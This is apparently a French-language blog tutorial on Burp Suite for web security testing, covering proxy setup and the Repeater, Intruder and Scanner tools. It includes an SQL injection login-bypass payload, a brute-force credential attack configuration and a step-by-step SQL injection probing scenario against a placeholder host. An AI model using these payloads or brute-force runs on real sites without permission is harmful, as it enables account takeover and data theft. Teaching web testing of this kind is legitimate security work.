Burp Suite : Plateforme de Test Web
Burp Suite est l'outil leader pour les tests de sécurité d'applications web.
Installation
# Kali Linux (pré-installé)
burpsuite
# Téléchargement manuel
# https://portswigger.net/burp/communitydownload
Configuration Proxy
Firefox :
- Paramètres → Réseau → Paramètres de connexion
- Configuration manuelle du proxy
- Proxy HTTP :
127.0.0.1Port :8080 - Cocher "Utiliser ce serveur proxy pour tous les protocoles"
Installer le certificat CA :
- Naviguer vers
http://burp - Cliquer "CA Certificate"
- Firefox → Paramètres → Certificats → Importer
- Cocher "Faire confiance pour identifier des sites web"
Proxy
# Intercepter le trafic
Proxy → Intercept is on
# Exemple de requête interceptée
GET /login.php HTTP/1.1
Host: cible.com
User-Agent: Mozilla/5.0
Cookie: PHPSESSID=abc123
# Modifier et Forward
# Ou Drop pour bloquer
Repeater
# Envoyer vers Repeater
Clic droit sur requête → Send to Repeater
# Modifier la requête
POST /login.php HTTP/1.1
Host: cible.com
Content-Type: application/x-www-form-urlencoded
username=admin' OR '1'='1&password=test
# Send → Analyser réponse
HTTP/1.1 200 OK
Set-Cookie: session=xyz789
Location: /dashboard.php
Intruder
Types d'attaque :
- Sniper - Un payload, une position à la fois
- Battering Ram - Un payload, toutes positions
- Pitchfork - Plusieurs payloads, itération parallèle
- Cluster Bomb - Toutes les combinaisons
Exemple : Brute-force login :
# Requête
POST /login.php HTTP/1.1
username=§admin§&password=§pass§
# Positions marquées avec §§
# Type : Cluster Bomb
# Payload 1 : Liste usernames
# Payload 2 : Liste passwords
# Lancer Attack
# Analyser Status codes et Length
Scanner (Pro)
# Scan passif automatique
# Détecte :
- XSS
- SQL Injection
- CSRF
- Clickjacking
- Etc.
# Scan actif (manuel)
Clic droit → Scan
Extensions Utiles
# Autorize - Test autorisation
# Logger++ - Logging avancé
# Param Miner - Découverte paramètres
# Turbo Intruder - Attaques rapides
# JWT Editor - Manipulation JWT
Scénario : Test Injection SQL
# Étape 1 : Intercepter requête
GET /product.php?id=1 HTTP/1.1
# Étape 2 : Send to Repeater
# Modifier : id=1'
# Réponse : Erreur SQL → Vulnérable
# Étape 3 : Send to Intruder
# Position : id=§1§
# Payload : SQL injection payloads
# Étape 4 : Analyser résultats
# Chercher différences dans réponses
Conclusion
Burp Suite est essentiel pour les tests web. Maîtrisez Proxy, Repeater et Intruder.
Chadow4
Commentaires (0)